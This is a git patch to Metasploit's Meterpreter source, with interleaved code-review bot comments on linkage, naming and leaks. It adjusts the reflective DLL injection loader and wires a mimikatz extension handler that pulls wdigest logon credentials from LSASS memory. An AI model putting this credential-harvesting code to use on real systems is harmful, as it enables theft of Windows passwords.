From 21e2b1fecfbd85df9467bf46c9b70a684d61daba Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 19 Apr 2013 21:45:33 +0100 Subject: [PATCH] Tidy --- .../ReflectiveDLLInjection/DelayLoadMetSrv.h | 12 ++--- .../ReflectiveDLLInjection/ReflectiveLoader.c | 13 +---- .../ReflectiveDLLInjection/ReflectiveLoader.h | 2 +- c/meterpreter/source/common/base.h | 5 -- c/meterpreter/source/common/common.h | 2 +- .../source/extensions/mimikatz/main.cpp | 50 ++++++++++++++++--- .../source/extensions/mimikatz/mimikatz.h | 7 +-- c/meterpreter/source/server/metsrv.c | 9 ---- .../ext_server_mimikatz.vcxproj | 12 ++++- 9 files changed, 62 insertions(+), 50 deletions(-) diff --git a/c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h b/c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h index 08fce2c8..9632ef40 100644 --- a/c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h +++ b/c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h @@ -35,15 +35,11 @@ #pragma comment (lib,"Delayimp.lib") // we use this like a macro to set the hook in an server extension that requires it -#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c +#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c -#ifdef __cplusplus - extern "C" HMODULE hMetSrv; - extern "C" FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli ); -#else - extern HMODULE hMetSrv; - FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli ); -#endif +extern HMODULE hMetSrv; + +FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli ); //===============================================================================================// #endif diff --git a/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c b/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c index 9ec222c7..9eb02474 100644 
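Review bot: Dropping the `#ifdef __cplusplus` / `extern "C"` branch leaves `hMetSrv` and `delayHook` with C++ linkage whenever this header is included from a C++ translation unit that does not itself wrap the include in `extern "C" { }`, so `__pfnDliNotifyHook2 = delayHook` would reference a mangled name that DelayLoadMetSrv.c never defines, and `hMetSrv` would become a second, unrelated object. The commit relies on the enclosing `extern "C" {` block that main.cpp opens, which makes the header no longer self-contained; the usual form keeps the declarations once and guards only the linkage specification. The same applies to the new `extern DWORD DLLEXPORT Init( SOCKET socket );` line in the ReflectiveLoader.c hunk at line 435 and to the `command_register`/`command_deregister` declarations in the base.h hunk.
```c
#ifdef __cplusplus
extern "C" {
#endif

extern HMODULE hMetSrv;

FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );

#ifdef __cplusplus
}
#endif
```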
--- a/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c +++ b/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c @@ -183,7 +183,7 @@ geteip: while( usCounter > 0 ) { // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); + dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); // if we have found a function we want we get its virtual address if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH || dwHashValue == VIRTUALLOCK_HASH || dwHashValue == OUTPUTDEBUG_HASH ) @@ -435,22 +435,13 @@ geteip: #ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN // you must implement this function... +extern DWORD DLLEXPORT Init( SOCKET socket ); -#ifdef __cplusplus -extern "C" DWORD DLLEXPORT Init( SOCKET socket ); -extern "C" BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ) ; - return TRUE; -} -#else -DWORD DLLEXPORT Init( SOCKET socket ); BOOL MetasploitDllAttach( SOCKET socket ) { Init( socket ); return TRUE; } -#endif BOOL MetasploitDllDetach( DWORD dwExitFunc ) { diff --git a/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h b/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h index 785fad2b..fc54cc50 100644 --- a/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h +++ b/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h @@ -63,7 +63,7 @@ __forceinline DWORD ror( DWORD d ) -__forceinline DWORD _hash( char * c ) +__forceinline DWORD hash( char * c ) { register DWORD h = 0; do diff --git a/c/meterpreter/source/common/base.h b/c/meterpreter/source/common/base.h index dfa55915..77d86785 100644 --- a/c/meterpreter/source/common/base.h +++ b/c/meterpreter/source/common/base.h 
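Review bot: Renaming `_hash` to the bare `hash` (here at the call site and in the ReflectiveLoader.h definition hunk) chooses a name that collides with `std::hash` once this file is `#include`d into a C++ unit with a using-directive for `std` in effect, which main.cpp appears to have given its unqualified `vector`/`wstring`/`make_pair`; with a C++11-era STL the call `hash( (char *)( ... ) )` can then be reported as ambiguous. A project-prefixed name avoids both that and the reserved-identifier problem the old `_hash` had, e.g. `dwHashValue = rdi_hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );` with the `__forceinline` definition in ReflectiveLoader.h renamed to match. The enclosing `while( usCounter > 0 )` loop starts before the hunk and continues after it.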
@@ -40,13 +40,8 @@ typedef struct command struct command *prev; } Command; -#ifdef __cplusplus -extern "C" LINKAGE DWORD command_register(Command *command); -extern "C" LINKAGE DWORD command_deregister(Command *command); -#else LINKAGE DWORD command_register(Command *command); LINKAGE DWORD command_deregister(Command *command); -#endif LINKAGE VOID command_join_threads( VOID ); diff --git a/c/meterpreter/source/common/common.h b/c/meterpreter/source/common/common.h index 5dfa3a37..d8547f41 100644 --- a/c/meterpreter/source/common/common.h +++ b/c/meterpreter/source/common/common.h @@ -203,7 +203,7 @@ static void real_dprintf(char *format, ...) { va_start(args,format); vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args); strcat_s(buffer, sizeof(buffer), "\r\n"); - OutputDebugStringA(buffer); + OutputDebugString(buffer); } #endif diff --git a/c/meterpreter/source/extensions/mimikatz/main.cpp b/c/meterpreter/source/extensions/mimikatz/main.cpp index 3b101fe1..0c61fba1 100644 --- a/c/meterpreter/source/extensions/mimikatz/main.cpp +++ b/c/meterpreter/source/extensions/mimikatz/main.cpp @@ -1,18 +1,28 @@ -#ifndef _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H -#define _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H +#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H +#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H +extern "C" +{ #include "../../common/common.h" +} #endif +#include +#include +#include +#include + + #include "mimikatz.h" + +extern "C" +{ + +#include "modules/mod_mimikatz_sekurlsa.h" + /* Benjamin DELPY `gentilkiwi` http://blog.gentilkiwi.com benjamin@gentilkiwi.com Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/fr/ */ -#include "modules/globdefs.h" -#include -#include -#include "mimikatz.h" - #include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h" // include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function 
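Review bot: `OutputDebugString(buffer)` is the TCHAR macro and resolves to `OutputDebugStringW` in any build with `UNICODE` defined, but `buffer` is the narrow `char` array filled by `vsnprintf_s` and `strcat_s(buffer, sizeof(buffer), "\r\n")` just above; in a C++ unit that is a type error, and in a C unit it compiles with a pointer-type warning and emits the bytes reinterpreted as UTF-16. The mimikatz extension this commit targets uses wide strings throughout (`std::wofstream`, `wstring`), so it is likely built with `UNICODE`. Keep the explicit narrow call, `OutputDebugStringA(buffer);`, which matches the buffer's type regardless of the character-set setting. `real_dprintf` starts before the hunk.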
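Review bot: The `extern "C" {` opened before `#include "modules/mod_mimikatz_sekurlsa.h"` (and closed only after `DeinitServerExtension` in the hunk at line 73) places a mimikatz C++ header under C linkage; if that header, or anything it includes for the first time, declares templates or overloaded functions, the compiler rejects it, since templates cannot have C linkage and C-linkage functions cannot be overloaded. Limit the block to the declarations that actually need it — `DelayLoadMetSrv.h`, `ReflectiveLoader.c` and the exported entry points such as `DeinitServerExtension` — and move `#include "modules/mod_mimikatz_sekurlsa.h"` outside it, next to `#include "mimikatz.h"`. The `#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H` guard is an include-guard idiom in a .cpp file that is never included; it can be dropped, leaving just the `extern "C" { #include "../../common/common.h" }` wrapper.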
@@ -20,11 +30,36 @@ // second stage reflective dll inject payload and not the metsrv itself when it loads extensions. #include "../../ReflectiveDLLInjection/ReflectiveLoader.c" + // this sets the delay load hook function, see DelayLoadMetSrv.h EnableDelayLoadMetSrv(); DWORD request_boiler(Remote *remote, Packet *packet) { + packet_transmit_response(0, remote, packet); + FILE *ficheiro = fopen("c:\\test.txt", "wb"); + fclose(ficheiro); + std::wofstream logFile( "c:\\out.txt"); + std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf()); + std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf()); + + vector * mesArguments = new vector(); + + mimikatz * myMimiKatz = new mimikatz(mesArguments); + + vector> monProvider; + monProvider.push_back(make_pair(mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData, wstring(L"wdigest"))); + + if (mod_mimikatz_sekurlsa::searchLSASSDatas()) + { + mod_mimikatz_sekurlsa::getLogonData(mesArguments, &monProvider); + } + + std::wcout.rdbuf(outbuf); + std::wcerr.rdbuf(errbuf); + + packet_transmit_response(0, remote, packet); + return 0; } @@ -73,6 +108,7 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote) return ERROR_SUCCESS; } +} //int wmain(int argc, wchar_t * argv[]) diff --git a/c/meterpreter/source/extensions/mimikatz/mimikatz.h b/c/meterpreter/source/extensions/mimikatz/mimikatz.h index a8e28398..6844cc57 100644 --- a/c/meterpreter/source/extensions/mimikatz/mimikatz.h +++ b/c/meterpreter/source/extensions/mimikatz/mimikatz.h @@ -1,8 +1,3 @@ -#ifndef _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H -#define _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H -#include "../../common/common.h" -#endif - /* Benjamin DELPY `gentilkiwi` http://blog.gentilkiwi.com benjamin@gentilkiwi.com @@ -10,7 +5,7 @@ */ #pragma once #include "modules/globdefs.h" -#include "modules/mod_parseur.h" +#include "modules/mod_parseur.h" #include "modules/mod_pipe.h" #include "modules/mod_process.h" #include "modules/mod_system.h" 
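Review bot: `packet_transmit_response(0, remote, packet);` is now called twice in `request_boiler`, once as the first statement and again after the `wcout`/`wcerr` buffers are restored, so the same request gets two replies; the first call should go. `FILE *ficheiro = fopen("c:\\test.txt", "wb");` is passed to `fclose` without a NULL check, which is undefined behaviour when the open fails, and it reads as debugging scaffolding alongside the hard-coded `c:\\out.txt` log. `mesArguments` and `myMimiKatz` are allocated with `new` and never deleted, and `myMimiKatz` is not used afterwards; declaring the arguments vector as a local object instead of `new vector()` and dropping the unused `mimikatz` instance removes both leaks. `return 0;` could also be `return ERROR_SUCCESS;` to match `DeinitServerExtension` below.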
diff --git a/c/meterpreter/source/server/metsrv.c b/c/meterpreter/source/server/metsrv.c index baa65c21..1bd6d8b9 100644 --- a/c/meterpreter/source/server/metsrv.c +++ b/c/meterpreter/source/server/metsrv.c @@ -13,21 +13,12 @@ * Entry point for the DLL (or not if compiled as an EXE) */ #ifdef _WIN32 -#ifdef __cplusplus -extern "C" DWORD __declspec(dllexport) Init(SOCKET fd) -{ - - return server_setup(fd); - -} -#else DWORD __declspec(dllexport) Init(SOCKET fd) { return server_setup(fd); } -#endif #else // rtld dynamically links libc/libm/libcrypto/libssl/metsrv_main diff --git a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj index 68d736a6..e8f448a0 100644 --- a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj +++ b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj @@ -65,8 +65,8 @@ $(SolutionDir)$(Configuration)\ $(Configuration)\ true - $(SolutionDir)$(Configuration)\ - $(Configuration)\ + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ false false $(SolutionDir)$(Configuration)\$(Platform)\ @@ -88,6 +88,8 @@ AllRules.ruleset + $(ProjectName).x86 + $(ProjectName).x86 @@ -109,6 +111,9 @@ MachineX86 kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;;psapi.lib;advapi32.lib;user32.lib;secur32.lib;crypt32.lib;shlwapi.lib;wtsapi32.lib;%(AdditionalDependencies) + + copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\" + @@ -150,6 +155,9 @@ MachineX86 5.0 + + copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\" +